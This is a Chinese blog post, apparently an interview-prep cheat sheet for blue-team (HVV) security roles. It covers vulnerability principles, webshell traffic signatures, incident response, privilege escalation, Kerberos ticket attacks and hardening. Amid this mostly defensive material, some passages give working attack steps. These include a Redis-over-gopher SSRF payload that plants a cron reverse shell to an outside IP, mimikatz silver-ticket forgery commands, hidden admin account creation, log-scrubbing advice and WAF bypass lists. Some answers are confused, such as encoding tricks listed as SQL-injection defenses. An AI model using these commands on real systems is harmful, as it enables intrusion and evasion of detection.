各位亲爱的小朋友,六一儿童节快乐呀!
愿你在学习的路上勤奋努力,书山有路勤为径,学海无涯苦作舟。
愿你在打工的日子里坚定勇敢,勤劳奋进,开拓创新,为自己的梦想努力拼搏。
愿你们永远保持童心,保持对生活的热爱与好奇。
愿你们在成长的道路上始终幸福快乐,充满阳光与希望。
当然以上都是一定的啦!各位鸿运齐天,就不需要我的祝福啦!
讨个彩头
目录
● windows或linux被植入后门文件,讲一下你的排查流程?
● windows、linux、数据的加固降权思路,任选其一
● 说一下深信服的态势感知有哪些模块?每个模块的内容分别是?
蓝中万字经
● *框架、中间件专区*
● weblogic原理
/console/consolejndi.portal 接口可以调用存在 JNDI 注入漏洞的 com.bea.console.handles.JndiBindingHandle 类,从而造成 RCE。
特征:请求的 url 中存在 payload,响应体有执行的结果。
● shiro原理
● 主要是由于在反序列化过程中,Shiro使用了基于CommonsBeanutils的BeanIntrospector机制,该机制会对反序列化的类进行实例化并设置属性,而攻击者可以通过构造恶意的序列化对象,在反序列化过程中实现任意代码执行。
● stu2原理
● 框架就是通过过滤器得到控制权,然后在strcut.xml中帮你把提交表单页面和处理出具并返回处理结果的类联系起来。(其中表单属性和处理结果返回页面的参数是通过,表单属性和类中的属性相同联系起来的!)
● log4j2原理
● 由于*Log4j2提供的lookup功能下的Jndi Lookup模块出现问题*所导致的,该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时,并没有对用户输入的信息进行判断,导致Log4j2请求远程主机上的含有恶意代码的资源 并执行其中的代码,从而造成远程代码执行漏洞。
● 讲一讲中间件常见漏洞?
● IIS:PUT漏洞(文件上传) 短文件名猜解 远程代码执行 解析漏洞
● Apache:解析漏洞 目录遍历 未授权
● Nginx:文件解析(1.jpg/.php) 目录遍历 CRLF注入 目录穿越(../../)
● Tomcat: 远程代码执行 war后门文件部署
● JBoss:反序列化漏洞 war后门文件部署
● Weblogic:反序列化漏洞 SSRF、任意文件上传 war后门文件部署
● shrio550和721的区别
● 主要区别在于Shiro550使用已知默认密码,只要有足够的密码,不需要Remember Cookie的
● Shiro721的ase加密的key为系统随机生成,需要利用登录后的rememberMe去爆破正确的key值。
● 利用有效的RememberMe Cookie作为Padding Oracle Attack的前缀,再去构造反序列化攻击。
● fastjson反序列化漏洞原理
● Fastjson的反序列化漏洞主要是由于Fastjson对JSON数据的反序列化方式不够安全导致的。
● 攻击者通过构造恶意JSON数据,将其发送给受害者的应用程序,然后利用Fastjson对恶意JSON数据进行反序列化,从而执行远程代码或实现其他恶意行为。
● fastjson不出网怎么利用?
● fastjson≤1.2.24
● 条件:BasicDataSource只需要有dbcp或tomcat-dbcp的依赖即可,dbcp即数据库连接池,在java中用于管理数据库连接。
● weblogic有几种漏洞?
● 基于T3协议的反序列化;
● 基于xml解析时候造成的反序列化;
● 还有ssrf,权限绕过等等。
● 怎么判断Struts2框架?
● 通过页面回显的错误消息来判断,页面不回显错误消息时则无效。
● 通过网页后缀来判断,如 .do .action 。
● Redis 未授权访问漏洞原理
● Redis在默认安装情况下,默认端口为6379,
● 没有添加过防火墙信任规则,修改默认端口等防护策略,
● 这相当于直接将 Redis服务暴露到公网上,如果设置密码认证(默认为空)的情况,会导致任意用户都可访问目标服务器--即Redis未授权访问,以及读取Redis的数据,
● 攻击者可以在这个条件下,如果Redis是以root身份运行,利用root权限的身份写入ssh公钥,通过ssh登录目标服务器,写入webshell,拿到控制权
● *流量特征专区*
● 冰蝎加密特征
● 冰蝎 2.0 强特征是 accept 里面有个 q=.2
● 冰蝎 3.0 Content-Type: application/octet-stream
● 冰蝎 4.0 ua头 referer头 accept 默认aes128 秘闻长度16整数倍
● 蚁剑加密特征
● 蚁剑是 ua 有 answord 蚁剑的加密特征是以 "0x.....="开头
● 哥斯拉加密特征
● 哥斯拉 pass 字段
● 菜刀加密特征
● 菜刀流量存在一些特征字 eval base64
● *菜刀流量特征是什么?*
请求包UA头为百度,火狐
请求体中存在eavl,base64等特征字符
请求体传递的payload为base64编码
● *蚁剑流量特征是什么?*
有些UA存在antsword
存在@ini_set(“display_errors”,"0")或者危险函数
● *冰蝎流量特征是什么?*
● webshell中有md5(密码)前16位
● *数据包中总是伴随着大量得content-type: 、application,无论GET还是POST*
● *冰蝎3.0内置的默认内置16个ua(user-agent)头*
● *content-length* *请求长度,对于上传文件,命令执行来讲,加密的参数不定长*
● *冰蝎3.0采用自定义的二进制协议进行通信,冰蝎4.0采用*HTTP协议*进行通信;*
● *冰鞋3.0使用DES加密算法,冰蝎4.0使用RC4加密算法;*
● *哥斯拉流量特征是什么?*
● 哥斯拉生成的webshell支持JAVA,C#以及PHP三种类型,
● JAVA支持生成jsp以及jspx两种后缀
● webshell同样有eavl,base64
● 请求为pass=
● *CobaltStrike流量特征什么?*
● *固定的user-agent头*
● *特殊的请求特征,使用Cobalt Strike下达指令时,会出现POST请求/sumbit.php?id=xxx的特征。*
● *魔改后的特征:遗留了GET /cx* *和POST /q.cgi* *等两个特征。*
● *被控端会发送心跳包。*
● *解密算法check sum8(92L,93L)。*
● AWVS流量特征
● AWVS 扫描器的特征 :主要是看请求包中是否含有 acunetix wvs 字段
● Nessus流量特征
● Nessus 扫描器的特征:nessus 字段
● st2-045流量特征
● payload存放在请求头的content-type中,正常content-type是代表的类型
● content-type会显得非常长、会有一些java命令
● 有回显的
● CS攻击流量特征
● 心跳包特征 间隔一定时间,均有通信 流级上的上下行数据长度固定
● 怎么拦截CS心跳包?
● 打开Wireshark,并选择需要捕获的网络接口 在过滤器栏中输入“http.request.uri contains “/”,然后点击“Apply”按钮。 这个过滤器可以过滤出HTTP请求中包含斜杠“/”的数据包,一般情况下,这些HTTP请求就是CS的心跳包 等待Wireshark捕获到CS的心跳包后,可以在数据包列表中找到这些HTTP请求。
Frp流量特征
文件落地 存在Privilege_key可能存在密码登录
隧道流量特征
cb1特征
● *挖矿、入侵排查专区*
● Linux入侵排查思路
● 第一步:分析安全日志 /var/log/secure 查看是否有 IP 爆破成功->
● 第二步:查看/etc/passwd 分析是否存在攻击者创建的恶意用户->
● 第三步:查看命令执行记录 ~/.bash_history 分析近期是否有账户执行过恶意操作系统命令->
● 第四步:分析/var/spool/mail/root Root 邮箱,当日志被删除可查询本文件->
● 第五步:分析中间件、Web 日志,如 access_log 文件->
● 第六步:调用命令 last/lastb 翻阅登录日志->
● 第七步:分析/var/log/cron 文件查看历史计划任务,
● 第八步->分析 history 日志分析操作命令记录->
● 最后一步:分析 redis、sql server、mysql、oracle 等日志文件
● Windows入侵排查思路
● 第一步:检查系统账号安全(查看服务器是否有弱口令,Netstat 查看网络连接对应的进程,再通过 tasklist 进行进程定位)->
● 第二步:查看系统登录日志,筛查 4776、4624(登录成功)事件进行分析->
● 第三步:使用命令 lusrmgr.msc 查看服务器是否存在可疑账号、新增账户->
● 第四步:使用 compmgmt.msc 查看本地用户组有没有隐藏账户->
● 第五步:导出日志利用 Log Parser 查看管理员登录时间、用户是否存在异常->
● 第六步:运行 taskschd.msc 排查有无可疑的计划任务->
● 第七步:输入%UserProfile%\Recent 分析最近打开过的可疑文件->
● 第八步:分析中间件日志,如 tomcat 的 logs 文件夹 localhost_access_log 日志文件 Appace 的access.log 日志文件。
● windows或linux被植入后门文件,讲一下你的排查流程?
● 检查系统日志,检查系统用户,查看是否有异常的系统用户,
● 检查异常进程,检查隐藏进程,
● 检查异常系统文件,检查系统文件完整性,检查网络,
● 检查系统计划任务,检查系统后门,检查系统服务。
● 入侵Linux服务器后需要清楚哪些日志?
● web日志,如apache的access.log,error.log。
● 直接将日志清除过于明显,一般使用sed进行定向清除。
● *挖矿病毒排查*
● *检查系统资源占用:*挖矿木马会占用大量的CPU或GPU资源,导致系统变得非常缓慢,可以使用Windows的任务管理器(Ctrl+Shift+Esc)或者Linux的top命令查看
● netstat: netstat -ano
● *查看进程列表:* tasklist
● *查看网络连接情况:*挖矿木马会通过网络连接到挖矿池,上传挖矿结果并下载新的挖矿任务,可以使用netstat命令或者Wireshark等网络抓包工具来检查网络连接情况;
● *检查系统进程表:*挖矿木马会在系统中创建新的进程,使用ps命令或者Windows的任务管理器来检查系统进程列表;
● *扫描系统文件:*挖矿木马可能会修改系统文件来隐藏自己,可以使用杀毒软件或命令行扫描工具进行扫描
● *挖矿事件如何处置*
● 首先要询问情况,看是什么时候发现的;
● 寻找攻击遗迹,看看cpu占用,进程,计划任务,可疑用户;
● 备份样本分析,上传沙箱获取攻击行为并尝试溯源加分;
● 及时清理后门,删除可疑计划任务,进程,启动项,文件等
● 提出修改建议
● 如果一台服务器被入侵后,你会如何做应急响应?
● 准备相关的工具,查后门等工具
● 初步判断事件类型,事件等级
● 抑制范围,隔离使受害面不继续扩大
● 查找原因,封堵攻击源。
● 业务恢复正常水平。
● 总结,报告,并修复,监控
● *挖矿处置方法*
● 确定主机类型(服务器、个人终端),系统类型windows
● 受感染资产是哪些
● 确定感染的数量,将感染的资产隔离
● 确定感染的时间,看系统日志是否异常,中间件日志,主机信息
● 看进程是否有异常,在windows
● 给安全建议(定期修改木马,打补丁,做好备份)
● 挖矿木马防范
● 避免使用弱口令
● 及时打补丁
● 服务器定期维护
● 流量文案也或者启动客户端时主要CPU/GPU的使用率
● 避免访问被标记为高风险的网站
● 避免下载来源不明的客户端和外挂等辅助软件
● *漏洞专区*
● SQL注入
● sql注入dnslog外带
● 利用UNC路径去访问服务器,dns会有日志,通过子查询,将内容拼接到域名内,
● 利用MYSQL内置函数load_file()去访问共享文件,访问的域名被记录,此时变为显错注入
● ,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,
● 访问时将访问服务器,记录后查看日志。
● 注:load_file函数在Linux下是无法用来做dnslog攻击的,涉及到Windows中的UNC路径。(linux中不存在UNC路径)
● sql注入堆叠
● 堆叠注入,顾名思义,就是将语句堆叠在一起进行查询
● 原理很简单,mysql_multi_query() 支持多条sql语句同时执行,就是个;分隔,成堆的执行sql语句
● select * from users;show databases;
● 就同时执行以上两条命令,所以我们可以增删改查,只要权限够
● 虽然这个注入姿势很牛逼,但实际遇到很少,其可能受到API或者数据库引擎,
● 又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,
● 利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,
● 往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。
● ssrf利用ridis打内网
● 通过【curl命令】和【gopher协议】远程攻击内网redis
● gopher协议是比http协议更早出现的协议,现在已经不常用了,但是在SSRF漏洞利用中gopher可以说是万金油,因为可以使用gopher发送各种格式的请求包,这样就可以解决漏洞点不在GET参数的问题了。
● gopher协议可配合linux下的curl命令伪造POST请求包发给内网主机。
● 此种方法能攻击成功的前提条件是:redis是以root权限运行的。
● payload2如下:
● curl -v 'http://xxx.xxx.xx.xx/xx.php?url=gopher://172.21.0.2:6379/
● _*1%250d%250a%248%250d%250aflushall%250d%250a%2a3%250d%250a%243%250d%250aset%250d%250a%241%250d%250a1%250d%250a%2464%250d%250a%250d%250a%250a%250a%2a%2f1%20%2a%20%2a%20%2a%20%2a%20bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.220.140%2f2333%200%3E%261%250a%250a%250a%250a%250a%250d%250a%250d%250a%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2fvar%2fspool%2fcron%2f%250d%250a%2a4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a%2a1%250d%250a%244%250d%250asave%250d%250aquit%250d%250a'
● redis命令进行了两次url编码,这里是通过gopher协议伪造的请求包用curl命令来发送;
● payload采用的是bash反弹,定时程序路径是/var/spool/cron/root
● 发送请求之前在公网机192.168.220.140开启nc监听端口2333
● nc -lvp 2333 (或nc -l 2333)
● SQL注入怎么写入webshell?
● 知道web绝对路径
● 有文件写入权限(一般情况只有ROOT用户有)
● 数据库开启了Secure_file_priv设置
● 然后就能用select into outfile写入webshell
● *提权专区*
● windows提权的方法及思路?
● 系统内核溢出提权
● 数据库提权
● 错误的系统配置提权
● DLL劫持提权
● web中间件漏洞提权
● AT、SC、PS提权等等
● linux提权的思路及方法有哪些?
● 系统内核溢出提权
● suid和guid提权
● 不安全的环境变量提权
● 定时任务提权
● 数据库提权
● mysql数据库提权的几种方法?
● UDF导出提权
● 利用自定义执行函数导出dll文件进行命令执行
● 手工创建plugin目录或利用NTFS创建
● mof加载提权
● 导出自定义mof文件到系统目录加载
● 同udf一样需要手工修改my.ini配置文件,添加secure-file-priv=
● 启动项重启提权
● 导出自定义bat或vbs到启动目录配合重启执行
● 反弹shell提权
● 用于UDF没有成功取得cmdshell和MOF提权都失败的情况
● 采用MYSQL反弹函数获取权限,不再调用命令执行类函数
● *内网渗透专区*
● 怎么制作白银票据?
● 条件
● 域名称
● 域的SID值
● 域的服务账户的密码HASH
● 伪造的用户名,可以是任意用户名,一般伪造administrator
● 需要访问的服务
● 步骤
● 第一步:
● 管理员权限运行
● mimikatzprivilege::debug #提升权限
● sekurlsa::logonpasswords #获取service账户hash 和sid(同一个域下得sid一样)
● 第二步:
● 清空本地票据缓存
● kerberos::purge #清理本地票据缓存
● kerberos::list #查看本地保存的票据
● 第三步:
● 伪造白银票据并导入
● kerberos::golden /domain:superman.com /sid:S-1-5-21-259090122-541454442-2960687606 /target:win08.superman.com /rc4:f6f19db774c63e49e9af61346adff204 /service:cifs /user:administrator /ptt
● 第四步:
● 访问域控的共享目录
● dir \win08\c$
● 远程登陆,执行命令
● PsExec.exe \win08 cmd.exe
● whoami #查看权限
● 怎么制作黄金票据?
● 1.域名称[AD PowerShell模块:(Get-ADDomain).DNSRoot]
● 2.域的SID 值[AD PowerShell模块:(Get-ADDomain).DomainSID.Value]
● 3.域的KRBTGT账户NTLM密码哈希
● 4.伪造用户名
● 横向渗透命令执行手段
● psexec
● wmic
● smbexec
● winrm
● net
● use共享+计划任务+type命令
● 内网黄金票据、白银票据的区别和利用方式
● 白银票据:抓取到了域控服务hash的情况下,在客户端以一个普通域用户的身份生成TGS票据,并且是针对于某个机器上的某个服务生成的白银票据,只能访问指定的target机器中指定的服务。
● 黄金票据:直接抓取于空中账号的hash,来在client端(客户端)生成一个TGT票据,那么该票据是针对所有机器的所有服务。
● 通过mimkatz执行,导出域控中站好的Hash
● 一台主机在内网进行横向攻击,你应该怎么做?
● 确定攻击来源,是不是员工内部误操作, 询问运维是否有自动化轮训脚本
● 如果没有,确定是攻击,根据时间点,设备信息,看安全事件,进程,流量
● 找到问题主机,开始应急响应流程:准备、检测、遏制、根除、恢复、跟踪,具体操作交给现场运维去处理
● *内网告警处理*
● 首先得*定位到具体得那一台机器*,既然*告警那就说明知道了具体的漏洞类型*,*相应的补丁打上*
● 以linux为主(*一般都会问linux的*),*查看/var/log/secure系统日志*,*查看登陆失败的记录*,还有linux历史命令—>*home目录的bash_histor*,查看*执行过的命令*。
● *再利用*webshell或者是*shell查杀工具 查杀*,*查看tmp目录下是否有带有免杀的木马。*彻底清除。
● 再到*全流量分析的机子上看*,是否有*经过其他的机器*。
● *拿到攻击ip之后*到线上的一些网站查看主机类型,比如*360或者微步*上,判断是否是 *傀儡机,vps跳板*
● 思路是 应急响应 安全加固 溯源
● *被攻击后日志文件或者木马文件被删除排查*:*lsof恢复被删除的文件*,然后查日志,查服务,查进程,查看是否有新增的账号
● *应急响应专区*
● 应急响应流程
● 首先通过分析报警,流量分析,日志来收集所发生事故的信息,判断是什么病毒什么样的事故
● 按优先级别给事故分级
● 然后抑制攻击范围,阻止受害面扩大,封ip、联系厂商能否下线、关系统
● 检查启动项 服务 进程 敏感文件 违规账号 结合everything 看新增加的文件新更改的文件
● 放到设备里扫一下有没有后门 修补漏洞 打补丁 增加安全策略
● 恢复业务系统
● 溯源
● 写报告
● 如果一台服务器被入侵后,你会如何做应急响应?
● 准备相关的工具,查后门等工具
● 初步判断事件类型,事件等级。
● 抑制范围,隔离使受害面部继续扩大
● 查找原因,风度攻击源。
● 业务恢复正常水平
● 总结,报告,并修复,监控
● 应急响应案例
● 挖矿病毒:
● 看到 cpu 占用率接近 100%,可能是挖矿,
● top 命令查看进程,找到占用 cpu异常进程,
● netstat -anptgrep 4452 查看 ip,查了一下是国外 ip,估计是后门或者挖矿进程。
● 使用 ki11 命令删除过一会儿又自启动了,判断是有定时任务,
● crontab-1看到了异常定时任务,每隔一分钟自动取 195.3.146.118 下载 unk.sh 文件 并执行。就终止异常进程、删除定时任务。但是过了一会儿 cpu 又跑起来了,就猜测有守护进程,systemctl status 6651,看到了一个.sh文件,先找到位置 pa auxgrep kinsin,看到三个异常进程和文件,全部该 ki11ki11 该删除删除。
● 最后查看网络连接,netstat -anpt,发现还有连接,接下来查看可以连接的文件位置,ps auxlgrep 6712,关闭对应进程,ki11-9 6712
● *安全设备专区*
● 了解过那些安全设备?
● 安恒、绿盟、奇安信、长亭、
● 设备误报如何处理?
● 来自外网的误报说明安全设备需要进行策略升级,不需要处置。
● 如果是来自内网的误报可以和负责人协商一下看能不能解决,有必要的话,添加白名单处理。
● 如何区分扫描流量和手工流量?
● 扫描流量数据量大,请求流量有规律可循 且 频率较高,手工流量请求少,间隔略长。
● 使用工具扫描的流量一般在数据包中有相关特征信息,比如说通过wireshark网络风暴分析工具对流量进行一个具体的排查分析,比如通过http contains “xxx” 来查找数据包中的关键字。
● 网站被上传webshell如何处理?
● 首先关闭网站,下线服务。有必要的话将服务器断网隔离。
● 手工结合工具进行检测。
● 加强安全策略,比如定期备份网站配置文件,及时安装服务器补丁,定期更新组件以及安全防护软件,定期修改密码等等措施。
● 谈谈IDS和IPS是什么?有什么作用?
● IDS(入侵检测):类似防火墙,主要用于入网流量检测
● IPS(入侵防御):对杀软和防火墙的补充,阻止病毒攻击以及点到点应用滥用。
● 你的IDS很久没有出现告警怎么办?
● 可能红队已经绕过了防火墙等设备,或者设备出现异常,及时上报。
● *WEB安全专区*
● 怎么识别CDN?
● 使用ping命令看回显
● 使用nslookup查询域名解析,看域名解析情况。
● 使用超级ping工具,像Tools、all—toll.cn等。
● 怎么判断是windows还是Linux?
● 通过ping靶机,看返回的TTL值,Windows大于100、Linux小于100的
● 看大小写,Linux区分大小写,Windows则不分。
● 在Windows靶标站点如何建立隐藏用户?
● net user xiaofeng$ 112233 /add (建立隐藏用户xiaofeng)
● net localgroup administrators xiaofeng$ /add (将隐藏用户xiaofeng加入管理员用户组)
● 判断网站的CMS有什么意义?
● 查找已曝光的漏洞。
● 如果开源,还能下载相应的源码进行代码审计。
● 根据CMS特征关联同CMS框架站带你,进行敏感备份文件扫描,有可能获得站点备份文件。
● DNS出网协议怎么利用?
● 将域名解析只想自己的VPS,然后设置ns击量等等
● 什么是CRLF注入攻击?
● 通过“回车”和“换行”字符注入HTTP流,实现网站篡改、跨站脚本、劫持等。
● 如何防御SQL注入?
● base编码、url编码、双url编码、宽字节、使用/**/分割SQL关键字、替换空格为xx
● 在代码层面使用过滤函数正则表达式等对传入的参数进行一个过滤、检测、处理,是的传入的而已数据无法按照预想方式执行
● 预编译SQL语句
● 使用waf,安全狗,阿里云盾等waf进行防护
● 经常进行基线检查、漏洞扫描等工作
● 命令执行与代码执行的区别
● 代码执行:执行效果完全依赖于语言本身
● 命令执行:执行效果不受语言本身、命令本身的限制
● 文件包含的原理
● 原理:
在处理⽤户输⼊的⽂件名或路径时,没有进⾏充分的验证和过滤,导致攻击者可以通过恶意构造的输⼊来包含任意⽂件,包括敏感⽂件、配置⽂件或执⾏恶意代码。
● 文件上传的原理
● 原理:
⽂件上传漏洞就是对上传的⽂件判断不够严谨可以绕过直接上传web后⻔。
测试⽅法有以下:
第⼀步,先测试上传⽂件判断是服务端还是客户端,如果是客户端直接
修改js源码或者抓包修改即可绕过
第⼆步,然后抓包修改数据包进⾏测试
● *域专区*
● 域内攻击方法有了解过吗?
● MS14-068
● Roasting攻击离线爆破密码
● 委派攻击
● 非约束性委派
● 基于资源的约束委派
● ntlm relay
● 域前置如何找到真实ip?
● 同源策略
● 域名、协议、端口均相同。
● *溯源反制专区*
● 攻击源捕获
● 安全设备报警,如扫描IP、威胁阻断、病毒木马、入侵事件等
● 日志与流量分析,异常的通讯流量、攻击源与攻击目标等
● 服务器资源异常,异常的文件、账号、进程、端口、启动项、计划任务和服务等
● 邮件钓鱼,获取恶意文件样本、钓鱼网站URL等
● 蜜罐系统,获取攻击者行为、意图的相关信息
● 溯源反制手段
● *IP定位技术*
● 根据ip定位物理地址---------代理ip
● 溯源案例:通过ip端口扫描,反向渗透服务器进行分析,最终定位到攻击者相关信息
● *ID追踪术*
● 搜索引擎,社交平台,技术论坛,社工库匹配
● 溯源案例:利用ID从技术论坛追溯邮箱,继续通过邮箱反追踪真实姓名,通过姓名找到相关简历信息
● *网站url*
● 域名Whois查询——注册人姓名,地址,电话和邮箱。---------域名隐私保护
● 溯源案例:通过攻击ip历史解析记录/域名,对域名注册信息进行溯源分析
● *恶意样本*
● 提取样本特征,如用户名,ID,邮箱、C2服务器等信息----------同源分析
● 溯源案例:样本分析过程中,发现攻击者的个人ID和QQ,成功定位到攻击者。
● *社交帐号*
● 基于JSONP跨域,获取攻击者的主机信息、浏览器信息、真实ip以社交信息等。
● 利用条件:可以找到相关社交网站的JSONP接口泄露敏感信息,相关网站登录未注销
● 攻击者画像
● 攻击路径
● 攻击目的:拿到权限、窃取数据、获取利益、DDOS等
● 网络代理:国外VPN、代理IP、跳板机、C2服务器等
● 攻击手法:鱼叉式邮件钓鱼、Web渗透、水坑攻击、社工等
● 攻击者身份画像
● 虚拟身份:ID、昵称、网名
● 真实身份:姓名、物理位置
● 联系方式:手机号、qq/微信、邮箱
● 组织情况:单位名称、职位信息
● *溯源场景案例*
● *案例一:邮件钓鱼攻击溯源*
● 攻防场景:攻击者利用社会工程学技巧伪造正常邮件内容,绕过邮件网关投递到目标邮箱,诱骗用户点击邮件链接或下载附件文件。
● 信息收集:通过查看邮件原文,获取发送方IP地址、域名后缀邮箱、钓鱼网站或恶意附件样本等信息。
● 溯源方式: 第一种,可以通过相关联的域名/IP进行追踪;第二种,对钓鱼网站进行反向渗透获取权限,进一步手机攻击者信息;第三种,通过对邮件恶意附件进行分析,利用威胁情报数据平台寻找同源样本获取信息,也能进一步对攻击者的画像进行勾勒。
● *案例二:Web 入侵溯源*
● 攻防场景:攻击者通过 NDAY 和 0DAY 漏洞渗入服务器网段,Webshell 触发安全预警或者威胁检测阻断了 C&C 域名的通讯。
● 溯源方式:隔离 webshell 样本,使用 Web 日志还原攻击路径,找到安全漏洞位置进行漏洞修复,从日志可以找到攻击者的 IP 地址,但攻击者一般都会使用代理服务器或匿名网络(例如 Tor)来掩盖其真实的 IP 地址。
● 在入侵过程中,使用反弹 shell、远程下载恶意文件、端口远程转发等方式,也容易触发威胁阻断,而这个域名/IP,提供一个反向信息收集和渗透测试的路径。
● *案例三:蜜罐溯源*
● 攻防场景:在企业内网部署蜜罐去模拟各种常见的应用服务,诱导攻击者攻击。
● 溯源方式:在攻击者入侵蜜罐时,蜜罐可以记录攻击者的入侵行为,获取攻击者的主机信息、浏览器信息、甚至是真实 IP 及社交信息。
● *安全加固专区*
● windows加固方法
● 修改3389端口
● 设置安全策略,不允许SAM账户的匿名枚举
● 设置windows密码策略
● 禁止445端口漏洞
● 在组策略中设置阻止访问注册表编辑工具
● 开启windows防火墙,关闭ping服务,打开3389、80等服务
● 关闭系统默认共享
● linux加固方法
● 修改ssh的配置文件,禁止root直接登录
● 修改密码策略配置文件,确保密码最小长度为8位
● 确保错误登录3次,锁定此账户5分钟
● 禁止su非法提权,只允许root和wheel组用户su到root
● 不响应ICMP请求
● 结束非法登录用户
● windows、linux、数据的加固降权思路,任选其一
● 禁用root
● 禁止远程访问
● 禁止写入
● 单独账号
● 禁止执行system等函数
● MYSQL加固方法(数据库加固)
● mysql:使用低权限用户配置网站、启用mysql日志记录、禁用文件导入导出
● sql server:使用低权限用户配置网站、关闭xp_cmdshell功能
● *安全工具专区*
● 常用查杀webshell工具
● D盾、河马
● WAF和IPS的区别
● IPS位于防火墙和网络的设备之间,WAF是工作在应用层的防火墙,主要对web请求/响应进行防护。
● SQLMap level和risk区别
● Level:控制SQLMap尝试的注入技术的复杂程度。 广度上的拓展
● Risk:控制SQLMap在测试中使用的风险等级 深度上的挖掘
● 你平时使用哪些工具?以及对应工具的特点?
● AWVS常规漏扫、
● Masscan快速查找端口、
● Burpsuite重复提交数据包。
● *配置专区*
● mysql的网站注入,5.0以上和5.0以下有什么区别?
● 5.0以下没有information_schema这个系统表,无法列表名等,只能暴力跑表名。
● *经历专区*
● 说一下去年护网的时候你的具体工作?
● 主要是再蓝方监控组看设备告警,发现危险IP,判断是否为一个安全事件,再进行封锁。
● 当时用的是奇安信的ngsoc,还有他家那个全流量分析天眼,以及IDS,还有内网这个蜜罐系统
● 说一下深信服的态势感知有哪些模块?每个模块的内容分别是?
● 监控中心:
● 综合安全感知、服务器安全感知、终端安全感知、用户安全感知、威胁感知、资产感知、安全播报
● 处置中心:
● 风险服务器视角、风险终端视角、风险安全域视角等等,会展示安全事件和基本情况。
● 分析中心:
● 威胁分析、访问分析和日志检索等
● 从网络安全层面介绍一些流量分析的经验?
● 1. 了解常见的攻击方式和特征:在进行流量分析时,需要对常见的攻击方式和特征有一定的了解,例如DDoS攻击、SQL注入、XSS攻击、端口扫描等。这些攻击都有一些特征和模式,通过识别这些特征,可以对网络中的攻击行为进行预警和防范。
● 2. 使用流量分析工具:流量分析工具是进行流量分析的重要工具,可以帮助快速分析和识别网络数据流量中的异常行为和攻击行为。常见的流量分析工具包括Wireshark、tcpdump、Snort、Suricata等,其中Wireshark是最为常用的一款流量分析工具。
● 3. 分析网络流量的特征和规律:在进行流量分析时,需要通过对网络流量的特征和规律进行分析,从而识别和发现网络中的异常行为。例如,在分析DDoS攻击时,可以通过对网络流量的大小、来源、目的等特征进行分析,从而识别和防范DDoS攻击。
● 4. 实时监控网络流量:实时监控网络流量可以帮助及时发现网络中的异常行为和攻击行为。为了
● 实现实时监控,可以使用一些自动化工具和技术,例如使用IDS/IPS系统、使用SIEM系统等。
● 以前的实习中做了什么事儿?
● *1.* 常规漏洞扫描:学习并使用常见漏洞扫描工具如Nessus、OpenVAS、Burp Suite等,对公司的系统和网络进行常规漏洞扫描,并分析扫描结果。
● *2.* 渗透测试:根据公司的要求,参与针对特定目标的渗透测试,并编写渗透测试报告,对发现的安全问题进行分析和评估,并提出改进建议。
● *3.* 安全事件响应:在安全事件发生时,参与安全事件的响应和处理,分析安全事件的来源和影响,确定应对措施,并跟进整个过程。
● *4.* 安全策略制定:学习并了解公司的安全政策和规范,并参与安全策略和规范的制定,推进公司的安全文化建设。
● *5.* 安全培训:参与公司内部的安全培训,包括网络安全知识、漏洞挖掘技术、安全工具使用等方面的培训。
● *6.* 漏洞挖掘:学习并掌握常见的漏洞挖掘技术,如代码审计、fuzzing等,并尝试在公司的系统和网络中寻找潜在的漏洞。
● *7.* 安全产品测试:参与安全产品的测试和评估,提供反馈和建议,帮助产品团队改进产品的安全性。
● *8.* 安全研究:学习最新的安全技术和研究成果,尝试探索新的安全领域和技术,并尝试将其应用到公司的实际工作中。
● *写入或检测Webshell专区*
● SQL注入些Webshell的方式有哪些?
● 可以通过SQL注入的一个select into outfile x 写入webshell
● 通过SQLMap --os-cmd参数来进行写入webshell
● 通过SQLMap --os-shell的方式来写入webshell
● redis怎么写入Webshell?
● 利用redis数据库的备份功能,知道网站路径以后,使用redis的CONFIG set 命令,将文件内容写为一句话木马,文件路径为网站根目录的webshell写入目标服务器。
● 如何检测webshell?
● 静态检测
● 静态检测通过匹配特征码,特征值,危险函数函数来查找webshell的方法,只能查找已知的webshell,
● 动态检测
● webshell传到服务器了,黑客总要去执行它吧,webshell执行时刻表现出来的特征,我们称为动态特征。
● 日志检测
● 使用Webshell一般不会在系统日志中留下记录,但是会在网站的web日志中留下Webshell页面的访问数据和数据提交记录。
● 语法检测
● 语法语义分析形式,是根据php语言扫描编译的实现方式,进行剥离代码、注释,分析变量、函数、字符串、语言结构的分析方式,来实现关键危险函数的捕捉方式。这样可以完美解决漏报的情况。但误报上,仍存在问题。
● *Bypass专区*
● SQL注入绕过
● /*/注释绕过,注释代替空格
● /!/内联注释绕过
● /!50001*/版本号绕过
● url编码绕过
● 特殊字符绕过 %0a换行
● 使用空字节%00
● 等价替换
● 文件上传绕过
● 1、改变文件格式
● 2、修改文件头
● 3、文件分块上传
● 4、伪造Content-Type
● SSRF绕过
● 利用HTTP协议特性绕过WAF。
● 使用长串字符绕过WAF。
● 利用漏洞绕过WAF。
● XSS绕过
● 大小写
● js伪协议
● 没有分号
● Flash
● Html5新标签
● Fuzz进行测试
标签:提权,特征,万字经,250d%,流量,2024,漏洞,250a%,HVV From: https://blog.csdn.net/weixin_55762309/article/details/139338194